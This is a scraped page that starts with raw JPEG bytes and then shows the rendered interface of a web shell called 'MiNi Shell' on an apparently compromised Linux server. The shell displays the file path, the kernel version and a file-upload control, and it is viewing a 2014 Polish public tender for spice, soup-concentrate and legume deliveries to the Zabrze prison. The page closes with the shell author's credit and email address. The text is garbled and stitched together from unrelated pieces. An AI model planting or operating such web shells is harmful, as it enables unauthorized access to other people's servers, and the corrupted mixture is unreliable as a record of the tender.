JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141202/249789-N-2014.html

<p class="kh_header"><b>Zabrze: Dostawa przypraw sypkich, w płynie i  używki, koncentratów, roślin strączkowych i soi do Zakładu Karnego w Zabrzu</b><br>
<b>Numer ogłoszenia: 249789 - 2014; data zamieszczenia: 02.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Janika 12, 41-806 Zabrze, woj. śląskie, tel. 0-32 373 66 30, faks 0-32 373 66 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa przypraw sypkich, w płynie i  używki, koncentratów, roślin strączkowych i soi do Zakładu Karnego w Zabrzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> V. Opis części zamówienia, jeżeli Zamawiający dopuszcza składanie ofert częściowych:
Zamawiający informuje, iż dopuszcza składanie ofert częściowych (liczba części - 3), wykaz części:
Część I :  Przyprawy sypkie, w płynie i używki
Część II:  Koncentraty zup i sosów
Część III: Rośliny strączkowe i soja

Część I - Przyprawy sypkie, w płynie i używki:

1.	Czosnek mielony -25 kg
2.	Liść laurowy -15 kg
3.	Majeranek -30 kg
4.	Papryka mielona czerwona , smak słodki, kolor czerwony, konsystencja sypka, opak. 500-1000 g  -20 kg
5.	Pieprz naturalny czarny mielony  80 kg
6.	Przyprawa typu jarzynka- 450 kg
7.	Przyprawa do gulaszu -  100 kg 
8.	Przyprawa do mięsa mielonego - 105 kg 
9.	Sól warzona spożywcza jodowana opakowanie 1000 g - ilośc  2100 kg
10.	Ziele angielskie- 25 kg
11.	Cukier waniliowy luzem - 4 kg
12.	Cynamon -10 kg
13.	Kwasek cytrynowy, produkt spożywczy w postaci drobnych kryształków bez grudek i       zlepów lub proszek-bezbarwny, smak silnie kwaśny, zapach bezwonny, opak. torebka per-gaminowa lub z tworzywa sztucznego od 100-500 g-  ilość 30 kg
14.	Przyprawa do bigosu -60 kg
15.	Musztarda sarepska, konsystencja gęsta, kolor odpowiedni do danego towaru typu sarep-ska, opak. 1-10 kg  - ilość  365 kg
16.	Kawa zbożowa -170 kg
17.	Herbata granulowana czarna-po zaparzeniu esencjonalny napar, wyraźnie wyczuwalny smak herbaty, po zaparzeniu kolor ciemnobrązowy -  ilość 370 kg
18.	Przyprawa do zup w płynie opak 1 litr , ekstrakt,  słodki niemodyfikowany genetycznie, bez dodatków mięsnych, brak alergenów - ilości 1600 litrów
19.	Ocet spirytusowy rektyfikowany 10%, produkt wyprodukowany z przedestylowanego alko-holu, pochodzenia rolniczego, barwa przezroczysta, konsystencja płynna, klarowna, smak i zapach mocno kwaśny, opak. Butelki szklane z nakrętką lub z tworzyw sztucznych(materiał opakowany dopuszczony do kontaktu z żywnością) poj. 1 litr .- 175 litrów

Część II - Koncentraty zup i sosów:

1.	Rosół z kury -350 kg
2.	Zupa barszcz czerwony - 220 kg
3.	Zupa grzybowa-220 kg
4.	Zupa żurek w proszku- 220 kg
5.	Sos cygański- 160 kg
6.	Sos grzybowy - 180 kg
7.	Sos pieczarkowy - 160 kg
8.	Sos pieczeniowy - 180  kg 
     
Część III -Rośliny strączkowe i soja: 

1.	Kostka sojowa - 50 kg
2.	Schab sojowy - 150 kg
3.	Fasola drobna -700 kg 
4.	Fasola biała duża - 800 kg
5.	Groch łuszczony -  1000 kg
6.	Groch cały - 800 kg
7.	Granulat sojowy - 145 kg


Art. żywnościowe będą dostarczane do magazynu żywnościowego zamawiającego, środkiem transportu, spełniającym wymogi określone w Ustawie z dnia 25 sierpnia 2006r.                               o bezpieczeństwie żywności i żywienia (Dz.U.z 2010r Nr 136, poz.914 j.t) którym dysponuje       wykonawca, bez dodatkowych opłat w dni robocze od poniedziałku do piątku w ilościach                  i terminach wskazanych przez zamawiającego, w godz. 7.30 - 12.30.  		                                                                            
                            Zamawiający  będzie składał zamówienia telefonicznie, sukcesywnie, według potrzeb.
Wymagana jest jednakowa data przydatności do spożycia dla całej partii dostarczanego  produktu, oraz znakowanie na partii jak również na poszczególnych produktach.
Wymagana jest jednakowa gramatura opakowania przy każdorazowej dostawie przez cały okres
trwania umowy.	
Wykonawca zobowiązuje się dostarczać zamówiony towar w ciągu 36 godzin, od chwili złożenia    zamówienia telefonicznego, a dostarczone art. żywnościowe powinny odpowiadać, co do jakości wymogom wynikającym z obowiązujących przepisów prawa.
Minimalny oczekiwany okres zapłaty wynosi 14 dni od dnia otrzymania faktury.

Odbioru towaru - ustalenia ilości i organoleptycznej oceny jakości będzie dokonywał upoważniony pracownik: magazynier żywnościowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.86.00.00-4, 15.89.00.00-3, 03.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin płatności - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty w przypadkach wymienionych poniżej (zgodnie z art. 144 ust. 1 ustawy Pzp):
 -  zmiana osób reprezentujących strony w przypadku zmian organizacyjnych,
 -  zmiana przepisów powszechnie obowiązujących, która wymusza zmianę treści umowy.
 -  zmiany wynikające z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy
    a są one korzystne dla  Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Zabrzu , ul. Janika 12,  41-806 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2014 godzina 10:00, miejsce: Zakład Karny w Zabrzu , ul. Janika 12,  41-806 Zabrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przyprawy sypkie w płynie i używki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Przyprawy sypkie, w płynie i używki:

1.	Czosnek mielony -25 kg
2.	Liść laurowy -15 kg
3.	Majeranek -30 kg
4.	Papryka mielona czerwona , smak słodki, kolor czerwony, konsystencja sypka, opak. 500-1000 g  -20 kg
5.	Pieprz naturalny czarny mielony  80 kg
6.	Przyprawa typu jarzynka- 450 kg
7.	Przyprawa do gulaszu -  100 kg 
8.	Przyprawa do mięsa mielonego - 105 kg 
9.	Sól warzona spożywcza jodowana opakowanie 1000 g - ilośc  2100 kg
10.	Ziele angielskie- 25 kg
11.	Cukier waniliowy luzem - 4 kg
12.	Cynamon -10 kg
13.	Kwasek cytrynowy, produkt spożywczy w postaci drobnych kryształków bez grudek i       zlepów lub proszek-bezbarwny, smak silnie kwaśny, zapach bezwonny, opak. torebka per-gaminowa lub z tworzywa sztucznego od 100-500 g-  ilość 30 kg
14.	Przyprawa do bigosu -60 kg
15.	Musztarda sarepska, konsystencja gęsta, kolor odpowiedni do danego towaru typu sarep-ska, opak. 1-10 kg  - ilość  365 kg
16.	Kawa zbożowa -170 kg
17.	Herbata granulowana czarna-po zaparzeniu esencjonalny napar, wyraźnie wyczuwalny smak herbaty, po zaparzeniu kolor ciemnobrązowy -  ilość 370 kg
18.	Przyprawa do zup w płynie opak 1 litr , ekstrakt,  słodki niemodyfikowany genetycznie, bez dodatków mięsnych, brak alergenów - ilości 1600 litrów
19.	Ocet spirytusowy rektyfikowany 10%, produkt wyprodukowany z przedestylowanego alko-holu, pochodzenia rolniczego, barwa przezroczysta, konsystencja płynna, klarowna, smak i zapach mocno kwaśny, opak. Butelki szklane z nakrętką lub z tworzyw sztucznych(materiał opakowany dopuszczony do kontaktu z żywnością) poj. 1 litr .- 175 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koncentraty zup i sosów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Koncentraty zup i sosów:

1.	Rosół z kury -350 kg
2.	Zupa barszcz czerwony - 220 kg
3.	Zupa grzybowa-220 kg
4.	Zupa żurek w proszku- 220 kg
5.	Sos cygański- 160 kg
6.	Sos grzybowy - 180 kg
7.	Sos pieczarkowy - 160 kg
8.	Sos pieczeniowy - 180  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rośliny strączkowe i soja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III -Rośliny strączkowe i soja: 

1.	Kostka sojowa - 50 kg
2.	Schab sojowy - 150 kg
3.	Fasola drobna -700 kg 
4.	Fasola biała duża - 800 kg
5.	Groch łuszczony -  1000 kg
6.	Groch cały - 800 kg
7.	Granulat sojowy - 145 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin płatności - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com